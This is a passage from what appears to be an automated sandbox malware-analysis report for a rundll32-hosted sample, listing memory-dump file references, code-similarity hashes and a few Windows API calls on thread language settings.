            • Associated: 00000005.00000002.799957271.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799986751.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800013171.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800053800.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800079496.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_4780000_rundll32.jbxd
            Similarity
            • API ID: InformationLogicalProcessor
            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
            • API String ID: 1773637529-79381301
            • Opcode ID: ca80dd7d1f6dd4924e408cdf504727e566a41f7e178896f08bf582f6dac976e3
            • Instruction ID: 1f896a6ef26d1f91e5c19b1684326dd60004ec7175b293655fed863373e3f2eb
            • Opcode Fuzzy Hash: ca80dd7d1f6dd4924e408cdf504727e566a41f7e178896f08bf582f6dac976e3
            • Instruction Fuzzy Hash: F61172F1D84208BEEB10FBA6DA48ABDB7F4EB44318F50809DEA04A7740D775AA408B10
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.775146289.0000000004781000.00000020.00000001.01000000.00000003.sdmp, Offset: 04780000, based on PE: true
            • Associated: 00000005.00000002.775106553.0000000004780000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.775372064.000000000479C000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781155918.0000000004B82000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781521684.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781572861.0000000004BA6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781591935.0000000004BA7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781621934.0000000004BAA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782290558.0000000004C23000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782446228.0000000004C35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782512497.0000000004C54000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782536414.0000000004C56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782640433.0000000004C60000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782822091.0000000004C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782863913.0000000004C92000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782914526.0000000004C9B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782957756.0000000004CA3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782991496.0000000004CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783075043.0000000004CB1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783585312.0000000004D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783657864.0000000004D10000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783738802.0000000004D19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783800617.0000000004D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783846142.0000000004D38000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783885377.0000000004D3A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783931040.0000000004D45000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784094597.0000000004D70000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784146835.0000000004D76000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784207759.0000000004D7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784311179.0000000004D87000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784385939.0000000004D8D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784451239.0000000004D95000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784500109.0000000004D97000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784561796.0000000004D9F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784583567.0000000004DA1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784936951.0000000004DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784997996.0000000004DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785037845.0000000004DFD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785086270.0000000004E19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785124129.0000000004E26000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785206285.0000000004E34000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785255997.0000000004E41000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785304408.0000000004E51000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785366505.0000000004E58000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785404846.0000000004E62000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785471248.0000000004E6C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785526298.0000000004E72000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785564052.0000000004E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785603676.0000000004E80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785631889.0000000004E89000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786320089.0000000004FB8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786357751.0000000004FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786406425.0000000004FC5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786437882.0000000004FDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786645614.0000000005029000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786678570.0000000005032000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786693967.0000000005038000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786718406.0000000005041000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786762519.000000000504A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786785100.000000000504C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787161893.000000000509A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787238587.00000000050A9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787269399.00000000050C6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787308357.00000000050D2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787490736.00000000050FD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787513447.0000000005106000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787544370.000000000510E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787579395.000000000511B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787625372.0000000005127000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787670625.000000000512D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787710163.000000000513B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787926575.000000000517F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788034217.000000000518F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788093126.00000000051AE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788307011.00000000051E4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788358433.00000000051EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788383650.00000000051F6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788420049.0000000005202000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788455128.000000000520D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788482684.0000000005214000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788519219.0000000005221000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788831481.0000000005261000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788870953.000000000526A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788965619.0000000005293000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789261976.00000000052D0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789302468.00000000052DB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789350158.00000000052E8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789388561.00000000052EE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789418869.00000000052F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790085438.0000000005429000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790165994.0000000005453000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790376479.000000000549E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790406091.00000000054A8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790433827.00000000054B2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790451175.00000000054B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790477265.00000000054C1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790639723.0000000005510000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790703599.000000000552B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790718650.0000000005533000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790733362.000000000553B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790792342.0000000005548000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791063153.0000000005575000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791096015.000000000557B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791126772.0000000005583000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791147376.000000000558B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791268451.0000000005599000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791422441.00000000055A3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791737718.00000000055DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791765988.00000000055E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791783859.00000000055EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791811297.00000000055F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791824595.00000000055FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791883327.0000000005607000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791913007.0000000005619000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792025797.0000000005634000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792175274.000000000566B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792223922.0000000005674000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792274323.000000000567C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792303062.0000000005686000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792339652.000000000568C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795084564.0000000005C79000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795097642.0000000005C7A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795113937.0000000005C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795215945.0000000005CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795231936.0000000005CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795984367.0000000005E72000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796015434.0000000005E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796134549.0000000005EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796157855.0000000005EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796197290.0000000005EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796249965.0000000005EA9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796280385.0000000005EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796318302.0000000005EAD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796397613.0000000005EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796472017.0000000005EB7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796498033.0000000005EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796524025.0000000005EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796637361.0000000005EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796654824.0000000005EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796688770.0000000005EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798273481.0000000006065000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798303268.0000000006069000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798331309.000000000606B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798358531.000000000606D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798443617.0000000006079000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798469010.000000000607B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798505150.000000000607D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798556764.0000000006083000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798588685.0000000006087000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798629809.0000000006089000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798682947.0000000006093000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798709255.0000000006095000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798826136.00000000060C2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799424596.0000000006191000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799439846.0000000006193000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799472608.00000000061A1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799493893.00000000061A5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799518956.00000000061A7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799534049.00000000061A9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799568889.00000000061AB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799588503.00000000061AD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799642185.00000000061BD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799657187.00000000061BF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799672052.00000000061C1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799774126.00000000061EC000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799930122.0000000006209000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799957271.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799986751.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800013171.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800053800.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800079496.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_4780000_rundll32.jbxd
            Similarity
            • API ID: CountTick
            • String ID:
            • API String ID: 536389180-0
            • Opcode ID: 98b6f49559c051c8add54b8e707177313e817791e37e3cc85e9e52f9405fb0cb
            • Instruction ID: cc9c2cf1fa7e3f138f30f2035d516445a14289e9a8458a2b4c1a60cb401de8a6
            • Opcode Fuzzy Hash: 98b6f49559c051c8add54b8e707177313e817791e37e3cc85e9e52f9405fb0cb
            • Instruction Fuzzy Hash: 59418BF06883419EE761BE7DC58433EBED1AF84358F15892CD6E897381EB75E4808752
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0478DB61
            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0478DBBF
            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0478DC1C
            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0478DC4F
              • Part of subcall function 0478DB0C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0478DBCD), ref: 0478DB23
              • Part of subcall function 0478DB0C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0478DBCD), ref: 0478DB40
            Memory Dump Source
            • Source File: 00000005.00000002.775146289.0000000004781000.00000020.00000001.01000000.00000003.sdmp, Offset: 04780000, based on PE: true
            • Associated: 00000005.00000002.775106553.0000000004780000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.775372064.000000000479C000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781155918.0000000004B82000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781521684.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781572861.0000000004BA6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781591935.0000000004BA7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781621934.0000000004BAA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782290558.0000000004C23000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782446228.0000000004C35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782512497.0000000004C54000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782536414.0000000004C56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782640433.0000000004C60000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782822091.0000000004C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782863913.0000000004C92000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782914526.0000000004C9B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782957756.0000000004CA3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782991496.0000000004CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783075043.0000000004CB1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783585312.0000000004D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783657864.0000000004D10000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783738802.0000000004D19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783800617.0000000004D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783846142.0000000004D38000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783885377.0000000004D3A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783931040.0000000004D45000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784094597.0000000004D70000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784146835.0000000004D76000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784207759.0000000004D7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784311179.0000000004D87000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784385939.0000000004D8D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784451239.0000000004D95000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784500109.0000000004D97000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784561796.0000000004D9F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784583567.0000000004DA1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784936951.0000000004DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784997996.0000000004DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785037845.0000000004DFD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785086270.0000000004E19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785124129.0000000004E26000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785206285.0000000004E34000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785255997.0000000004E41000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785304408.0000000004E51000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785366505.0000000004E58000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785404846.0000000004E62000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785471248.0000000004E6C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785526298.0000000004E72000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785564052.0000000004E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785603676.0000000004E80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785631889.0000000004E89000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786320089.0000000004FB8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786357751.0000000004FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786406425.0000000004FC5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786437882.0000000004FDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786645614.0000000005029000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786678570.0000000005032000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786693967.0000000005038000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786718406.0000000005041000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786762519.000000000504A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786785100.000000000504C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787161893.000000000509A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787238587.00000000050A9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787269399.00000000050C6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787308357.00000000050D2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787490736.00000000050FD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787513447.0000000005106000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787544370.000000000510E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787579395.000000000511B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787625372.0000000005127000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787670625.000000000512D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787710163.000000000513B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.787926575.000000000517F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788034217.000000000518F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788093126.00000000051AE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788307011.00000000051E4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788358433.00000000051EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788383650.00000000051F6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788420049.0000000005202000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788455128.000000000520D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788482684.0000000005214000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788519219.0000000005221000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788831481.0000000005261000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788870953.000000000526A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.788965619.0000000005293000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789261976.00000000052D0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789302468.00000000052DB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789350158.00000000052E8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789388561.00000000052EE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.789418869.00000000052F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790085438.0000000005429000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790165994.0000000005453000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790376479.000000000549E000.00000002.00000001.01000000.00000003.sdmpDownload File
